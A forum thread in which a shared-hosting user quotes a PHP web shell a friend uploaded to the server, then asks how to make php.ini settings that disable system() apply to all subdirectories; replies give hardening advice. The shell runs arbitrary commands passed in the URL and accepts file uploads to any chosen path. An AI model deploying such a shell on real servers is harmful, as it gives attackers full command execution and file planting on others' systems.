A few weeks ago I opened up a hole on my shared server and my friend uploaded the following PHP script:

<?php
if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>

<?php
if(isset($_REQUEST['upload'])) {
    echo '<form enctype="multipart/form-data" action=".config.php?send" method="POST">
        <input type="hidden" name="MAX_FILE_SIZE" value="5120000" />
        Send this file: <input name="userfile" type="file" />
        To here: <input type="text" name="direct" value="/home/chriskan/public_html/_phx2600/wp-content/???" />
        <input type="submit" value="Send File" />
    </form>';
}
?>

<?php
if(isset($_REQUEST['send'])) {
    $uploaddir = $_POST["direct"];
    $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

    if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
        echo "File is valid, and was successfully uploaded.\n"; echo $uploaddir;
    } else {
        echo "Upload failed";
    }
}
?>

This script allows him to process commands through in-URL variables.

I have disabled system, among other functions, in the php.ini file in my public_html directory. This will prevent the script from running if it's located within my public_html directory, but doesn't stop it if it's in a sub-directory of that. If I copy the php.ini file into a sub-directory it will stop it from running from that directory.

My question is, how do I enable my php.ini file to affect all directories/sub-directories of my server?

One, kick off a "friend" that chooses to run scripts like this.

Then worry about securing your server. Your system has a master php.ini somewhere (often /etc/php.ini, but if can be in several places, check php_info()). That file controls the default settings for your server. Also, you can block local settings files that allow overrides.

Wow! move the php.ini file on a per-directory basis? Didnt know you could do that.

My best guess (someone please correct me if im wrong), php probably overrides the global php.ini file with a local set of rules on a per-directory basis (much like .htaccess), so basically all you would need to do is to update your php.ini directives to the global php.ini (found here in ubuntu: etc/php5/apache2/php.ini)

Alternatively, you might want to try to use .htaccess to prepend a php page onto all pages with the following:

ini_set('your_directive')

Of course, make sure the .htaccess which calls the prepend php sits at the root, else you're stuck with the same issue.

/mp

Thanks guys, your answers were great, but the answer was right under my nose the entire time. Via cPanel I was able to edit my server to use a single php.ini file.

Are you sure? I wish I had your ISP. By default some ISPs will provide a local copy of the ini file in public_html to allow overrides. But cPanel usually only provides a reference of the server-wide defaults.